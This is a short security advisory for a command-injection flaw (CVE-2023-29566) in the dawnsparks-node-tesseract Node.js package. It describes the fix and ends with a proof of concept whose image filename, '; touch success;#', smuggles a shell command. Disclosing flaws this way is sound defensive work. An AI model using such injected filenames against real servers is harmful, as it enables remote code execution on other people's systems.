Arbitrary Code Execution Affecting dawnsparks-node-tesseract package, versions <0.4.1
Snyk ID SNYK-JS-DAWNSPARKSNODETESSERACT-5458970
- published 25 Apr 2023
- disclosed 24 Apr 2023
- credit Unknown
Introduced: 24 Apr 2023
CVE-2023-29566
How to fix?
Upgrade dawnsparks-node-tesseract to version 0.4.1 or higher.
Overview
dawnsparks-node-tesseract is a fork of a simple wrapper for the Tesseract OCR package.
Affected versions of this package are vulnerable to Arbitrary Code Execution via a child_process call, because the image filename is passed to the shell without sanitization.
To exploit this vulnerability, a user must submit an image file to a Node.js application that is using "dawnsparks-node-tesseract" as a dependency to perform optical character recognition. If the user's submitted image filename contains shell commands, those will be evaluated, allowing the user to execute arbitrary commands on the application's server.
PoC
var PUT = require('dawnsparks-node-tesseract');
var user_image_filename = "; touch success;#";
try {
    new PUT.process(user_image_filename, {}, function () {});
} catch (e) {
    console.log(e);
}